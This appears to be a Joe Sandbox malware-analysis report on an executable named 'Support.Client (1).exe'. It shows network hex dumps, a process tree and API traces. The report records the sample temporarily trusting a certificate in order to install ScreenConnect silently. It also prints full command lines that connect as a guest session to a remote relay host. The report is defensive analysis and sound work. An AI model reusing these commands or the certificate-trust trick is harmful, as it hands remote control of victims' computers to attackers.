2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 73 78 09 00 06 14 28 35 04 00 06 26 2a 1e 02 7b 6e 01 00 0a 2a 22 02 03 7d 6e 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6f 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 48 01 00 0a 0a 02 7b 70 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 70 01 00 0a 06 02 7b 70 01 00 0a fe 01 2a 3e 03 6f 16 07 00 06 04 6f 16 07 00 06 fe 01 2a 3e 02 03 28 71 01 00 0a 02 15 7d 72 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 73 01 00 0a 0a 03 6f 16 07 00 06 02 7b 72 01 00 0a fe 01 06 5f 2c 42 02 7b 74 01 00 0a 8c 81 00 00 1b 2c 18 02 28 75 01 00 0a 02 fe 06 76 01 00 0a 73 77 01 00 0a 28 2c 00 00 2b 26 02 15 7d 72 01 00 0a 02 7c 74 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 16 07 00 06 02 Data Ascii: sx(5&{n"}n:(<(o0(<oH{p-(++,}p{p>oo>(q}r03=-(so{r_,B{t,(uvsw(,+&}r\|t*o
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 00 07 00 0a 11 00 16 00 00 00 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c8 02 00 0a 0a 2b 30 03 04 73 c9 02 00 0a 0a 2b 26 03 04 73 ca 02 00 0a 0a 2b 1c 03 04 73 96 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b6 00 00 02 14 73 cb 02 00 0a 7a 06 2a 5a d0 8f 00 00 1b 28 3e 01 00 0a 02 28 cc 02 00 0a a5 8f 00 00 1b 2a 9e 03 02 7e d3 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 a8 0e 00 06 73 cd 02 00 0a 25 80 d3 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 ce 02 00 0a 2d 0a 12 00 fe 15 8f 00 00 1b 06 2a 00 03 6f 0a 02 00 0a 0a de 07 02 28 2f 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 Data Ascii: :(}+(~+&0TBE +(s+0s+&s+s+rpszZ(>(~%-&~s%(+0%(-o(/
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 00 00 00 13 30 04 00 32 00 00 00 d4 00 00 11 02 03 6f 3c 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 88 03 00 0a 02 06 17 58 6f f4 02 00 0a 28 59 00 00 2b 73 3b 04 00 0a 2a fe 02 25 2d 06 26 7e 9a 01 00 0a 03 6f 8e 01 00 0a 7e e5 05 00 04 25 2d 17 26 7e d2 05 00 04 fe 06 ba 0e 00 06 73 a1 02 00 0a 25 80 e5 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 16 04 00 0a 81 8f 00 00 1b 04 0f 00 28 17 04 00 0a 81 90 00 00 1b 2a 3e 1f fe 73 9b 0f 00 06 25 02 7d a2 06 00 04 2a ae 02 16 16 16 16 73 27 03 00 06 7e d1 05 00 04 25 2d 13 26 14 fe 06 44 03 00 06 73 3d 04 00 0a 25 80 d1 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 4c 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f Data Ascii: 02o<3oXo(Y+s;%-&~o~%-&~s%(+(n(r+n((>s%}s'~%-&Ds=%(+(+(+-j+j(L(+*&f_
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 00 04 2a 22 02 03 7d 93 02 00 04 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a 1e 02 7b 95 02 00 04 2a 22 02 03 7d 95 02 00 04 2a 00 13 30 04 00 fd 00 00 00 1f 01 00 11 1f 12 8d b8 00 00 01 25 16 72 e8 13 00 70 a2 25 17 02 28 55 07 00 06 28 57 0b 00 06 a2 25 18 72 fe 13 00 70 a2 25 19 02 28 57 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1a 72 10 14 00 70 a2 25 1b 02 28 59 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 5b 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 5d 07 00 06 0a 12 00 28 98 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 5f 07 00 06 28 57 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 61 07 00 06 0b 12 01 fe 16 2d 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 Data Ascii: "}{"}{"}0%rp%(U(W%rp%(W(%rp%(Y(%r"p%([(%r4p%(](%r2p%(_(W%rHp%(a-oC%rhp
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 04 04 9a 2c 0d 02 7b d7 03 00 04 04 9a 8e 69 06 2f 0e 02 7b d7 03 00 04 04 06 8d b9 00 00 01 a2 02 7b d7 03 00 04 04 9a 2a 9a 02 02 7b d8 03 00 04 02 28 f5 01 00 06 6a 58 7d d8 03 00 04 02 02 7b d9 03 00 04 7e 2c 06 00 0a 28 80 01 00 2b 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d9 03 00 04 0a 06 0b 07 03 28 2f 06 00 0a 74 4f 00 00 1b 0c 02 7c d9 03 00 04 08 07 28 81 01 00 2b 0a 06 07 33 df 2a 56 02 28 37 0a 00 06 02 03 7d da 03 00 04 02 04 7d db 03 00 04 2a 1e 02 7b da 03 00 04 2a 1e 02 7b db 03 00 04 2a 5a 03 02 28 3f 0a 00 06 5a 1e 28 19 04 00 06 02 28 40 0a 00 06 58 2a 86 02 Data Ascii: ,{i/{{{(jX}{~,(+0)Q{(-tO\|(+30)Q{(/tO\|(+3V(7}}{{Z(?Z((@X
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 6f 0b 0c 00 06 02 07 04 28 02 0c 00 06 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0d 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 1b 30 06 00 44 00 00 00 79 01 00 11 03 6f 18 07 00 0a 0a 2b 26 06 6f 19 07 00 0a 0b 07 04 07 6f 0b 0c 00 06 02 05 07 6f 0a 0c 00 06 28 0b 09 00 06 6f 0e 0c 00 06 28 03 0c 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3d 04 00 04 02 04 7d 3e 04 00 04 02 05 7d 3f 04 00 04 02 0e 04 7d 40 04 00 04 02 0e 05 7d 41 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 1e 02 7b Data Ascii: o+&oo(o(oo-,o290Dyo+&ooo(o(o-,o29(<}=}>}?}@}A{={>{?{
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 00 06 14 0c 02 7b 31 05 00 04 16 e0 2e 0b 02 7b 31 05 00 04 25 4b 06 58 54 03 06 58 10 01 04 06 59 10 02 02 7b 30 05 00 04 7c 88 00 00 04 06 28 57 03 00 06 04 3a 6a ff ff ff 2a 0a 17 2a 0a 17 2a 0a 17 2a 0a 17 2a 06 2a 00 00 13 30 05 00 1c 00 00 00 08 00 00 11 05 0e 04 8e 69 0e 05 59 28 62 01 00 0a 0a 03 04 0e 04 0e 05 06 28 34 02 00 0a 06 2a 1a 73 6c 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 ad 0d 00 06 80 32 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 33 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 81 01 00 0a 6f 7d 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 8a 01 00 0a 6f 7d 01 00 0a 2a 2e 73 b6 0d 00 06 80 38 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 5d 02 00 06 2a 22 03 04 28 63 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 Data Ascii: {1.{1%KXTXY{0\|(W:j*****0iY(b(4slz(<.s2(<2{3oB(<6{o}(<6{o}.s8(<"(]"(c(<*
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 00 04 2a 32 02 7b 1d 07 00 04 6f 2f 0a 00 0a 2a 22 02 03 7d 1e 07 00 04 2a 32 02 7b 1e 07 00 04 6f 30 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 46 02 7b 1f 07 00 04 28 57 06 00 06 8c db 02 00 02 2a 1e 02 28 3c 00 00 0a 2a 36 02 7b 31 0a 00 0a 16 6f 32 0a 00 0a 2a 36 02 7b 31 0a 00 0a 17 6f 32 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 24 05 00 0a 02 7b 25 05 00 0a 28 33 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 29 05 00 0a 02 7b 2a 05 00 0a 28 33 0a 00 0a 2a 2e 73 0c 10 00 06 80 25 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 23 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 10 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 13 10 00 06 80 2a 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 53 0b 00 06 2a 3a 0f 01 fe 16 4f 01 00 Data Ascii: 2{o/"}2{o0(<F{(W(<6{1o26{1o2(<J{${%(3(<J{){(3.s%(<o#oC.s((<oC.s(<"(S*:O
2024-11-13 17:18:23 UTC	16384	IN	Data Raw: 01 10 00 23 31 00 00 bf 3d 01 00 6d 00 88 01 ef 02 81 01 10 00 1b 32 00 00 bf 3d 01 00 35 00 89 01 f4 02 81 01 10 00 bd 27 00 00 bf 3d 01 00 35 00 8a 01 f5 02 01 00 10 00 3f 31 00 00 bf 3d 01 00 35 00 8b 01 f7 02 01 00 10 00 4c b0 00 00 bf 3d 01 00 45 00 8d 01 fb 02 09 01 10 00 9b 2e 01 00 bf 3d 01 00 6d 00 8d 01 fc 02 a1 00 10 00 48 26 00 00 bf 3d 01 00 00 00 90 01 03 03 81 01 10 00 fd 2b 01 00 bf 3d 01 00 35 00 90 01 04 03 01 01 00 00 b2 6a 01 00 bf 3d 01 00 c5 00 90 01 05 03 01 01 00 00 00 8e 00 00 bf 3d 01 00 c5 00 96 01 05 03 09 01 10 00 cc 36 01 00 bf 3d 01 00 6d 00 9c 01 05 03 09 01 10 00 7e 50 01 00 bf 3d 01 00 6d 00 a0 01 0d 03 09 01 10 00 4f bc 00 00 bf 3d 01 00 6d 00 a2 01 1b 03 09 01 10 00 2e 3b 01 00 bf 3d 01 00 6d 00 a4 01 26 03 09 01 10 00 Data Ascii: #1=m2=5'=5?1=5L=E.=mH&=+=5j==6=m~P=mO=m.;=m&

Target ID:	0
Start time:	12:17:55
Start date:	13/11/2024
Path:	C:\Users\user\Desktop\Support.Client (1).exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Support.Client (1).exe"
Imagebase:	0x610000
File size:	83'328 bytes
MD5 hash:	EE2FD372B98D7899C7E12D85F4C7F695
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:17:55
Start date:	13/11/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Imagebase:	0x2cad85b0000
File size:	24'856 bytes
MD5 hash:	B4088F44B80D363902E11F897A7BAC09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000001.00000002.2526431199.000002CADA736000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:17:56
Start date:	13/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:17:56
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872
Imagebase:	0x20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:17:56
Start date:	13/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748
Imagebase:	0x20000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:17:56
Start date:	13/11/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6eef20000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:18:24
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
Imagebase:	0xf0000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1948916428.00000000000F2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.1968054123.000000000246F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:18:24
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Imagebase:	0xd70000
File size:	95'512 bytes
MD5 hash:	75B21D04C69128A7230A0998086B61AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:18:25
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Imagebase:	0xd70000
File size:	95'512 bytes
MD5 hash:	75B21D04C69128A7230A0998086B61AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	12:18:26
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
Imagebase:	0x810000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	12:18:28
Start date:	13/11/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"
Imagebase:	0x4b0000
File size:	602'392 bytes
MD5 hash:	1778204A8C3BC2B8E5E4194EDBAF7135
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	1457
Total number of Limit Nodes:	4

Executed Functions

Function 00611000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 00611016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00611025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00611032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 00611057
LocalAlloc.KERNEL32(00000000,00040000), ref: 00611063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00611082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 006110B2
LocalAlloc.KERNEL32(00000000,?), ref: 006110C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 006110F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 0061110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 0061111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 0061112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 00611134
LocalFree.KERNEL32(00000000), ref: 0061113E
LocalFree.KERNEL32(00000000), ref: 0061115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 0061116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00611182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00611198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 006111A9
LoadLibraryA.KERNELBASE(dfshim), ref: 006111BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 006111C6
Sleep.KERNELBASE(00009C40), ref: 006111E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 0061120B
CertCloseStore.CRYPT32(?,00000000), ref: 0061121A
LocalFree.KERNEL32(?), ref: 00611223
LocalFree.KERNEL32(?), ref: 00611228
LocalFree.KERNEL32(?), ref: 0061122D

Strings

TrustedPublisher, xrefs: 0061102B
1.3.6.1.4.1.311.4.1.1, xrefs: 00611193, 006111A4
dfshim, xrefs: 006111B5
ShOpenVerbApplicationW, xrefs: 006111C0

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: cf48df1105e6d21471b81b379187b0c64a72412ead0e5f2f8a53e5af2d88f4c1
Instruction ID: 1d5a7afa10a10d0168fdb63e3bbae5fc5d2dca139ce18f54561fa3ebcbf64c93
Opcode Fuzzy Hash: cf48df1105e6d21471b81b379187b0c64a72412ead0e5f2f8a53e5af2d88f4c1
Instruction Fuzzy Hash: 5E618D71A00208BFEB119FA0DC45FEFBBB6EF48B51F095055F614BB290C7719A418BA4

Non-executed Functions

Function 0061191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0061192B
IsDebuggerPresent.KERNEL32 ref: 006119F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00611A10
UnhandledExceptionFilter.KERNEL32(?), ref: 00611A1A

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: faabd057662aedbfc5b98c7f0e7ef5f0a545b08e03e425c8a8d96fbb8c7c4495
Instruction ID: 04ac0776baeeeee1b6e8c3c4ddaafd74955ab16d3fe358ff54a474bf5d223d6e
Opcode Fuzzy Hash: faabd057662aedbfc5b98c7f0e7ef5f0a545b08e03e425c8a8d96fbb8c7c4495
Instruction Fuzzy Hash: 17312675D012289BDF20DFA4D949BCDBBB8AF08301F1481AAE50CAB250EB749AC5CF45

Function 00614573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0061466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00614675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00614682

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: a4effb3dc53844036fba21e6628509d72a4f5ba514759eacc1fbb64ba7916476
Instruction ID: 298b3a4335079d3daa14c87ed2698dbdacfa902c36513874e681b264756faa12
Opcode Fuzzy Hash: a4effb3dc53844036fba21e6628509d72a4f5ba514759eacc1fbb64ba7916476
Instruction Fuzzy Hash: 9B31D3749012289BCB61DF64D988BCDBBB9BF08311F5451EAE41CA7250EB709BC58F45

Function 00613677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000,?,00613F66,00000003,0061209F,00611AFC), ref: 00613698
TerminateProcess.KERNEL32(00000000,?,0061364D,?,006202E0,0000000C,006137A4,?,00000002,00000000,?,00613F66,00000003,0061209F,00611AFC), ref: 0061369F
ExitProcess.KERNEL32 ref: 006136B1

Memory Dump Source

Source File: 00000000.00000002.1846767601.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.1846743964.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846791017.000000000061B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846815777.0000000000621000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1846838602.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_Support.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 58ff4a3db65dc9f263bd5127dc5d871362cda692fa08a8218396f7506ebab705
Instruction ID: 22acf8e95cefab385da60d3c0484bfe26f913d4045b05a75475547836eec54ac
Opcode Fuzzy Hash: 58ff4a3db65dc9f263bd5127dc5d871362cda692fa08a8218396f7506ebab705
